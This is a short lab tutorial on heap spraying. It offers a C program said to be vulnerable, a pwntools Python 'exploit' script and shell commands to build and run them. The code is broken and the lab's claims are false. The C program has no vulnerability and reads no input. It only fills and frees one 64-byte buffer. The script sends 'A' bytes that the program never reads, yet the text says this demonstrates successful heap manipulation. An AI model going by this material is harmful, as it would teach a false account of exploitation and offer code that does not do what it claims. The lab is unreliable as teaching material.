Heap Spray Techniques Lab

Heap Spray Techniques Lab

In this lab, we will manipulate the heap with heap spray techniques to facilitate exploitation.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with heap manipulation vulnerability.

  #include <stdio.h>
  #include <stdlib.h>

  void vulnerable_function() {
      char *ptr = (char *)malloc(64);
      if (ptr != NULL) {
          // Simulate heap spray
          for (int i = 0; i < 64; i++) {
              ptr[i] = 'A';
          }
          printf("Heap spray completed.\n");
          free(ptr);
      }
  }

  int main() {
      vulnerable_function();
      return 0;
  }
  

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to perform heap spraying.

  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Payload for heap spraying
  payload = b'A' * 64

  # Launch the exploit
  p = process(binary_path)
  p.send(payload)
  p.recvline()  # Receive the output indicating heap spray completion
  p.close()
  

Explanation of the Python script:

• We specify the path to the vulnerable binary and create a payload consisting of 'A' characters to spray the heap.
• We launch the vulnerable binary and send the payload to perform heap spraying.
• We receive the output indicating heap spray completion.

3. Exploiting the Vulnerability:

Execute the Python script to perform heap spraying:

$ python exploit.py

Once executed, you should observe the output indicating the completion of heap spraying, demonstrating the successful manipulation of the heap using heap spray techniques.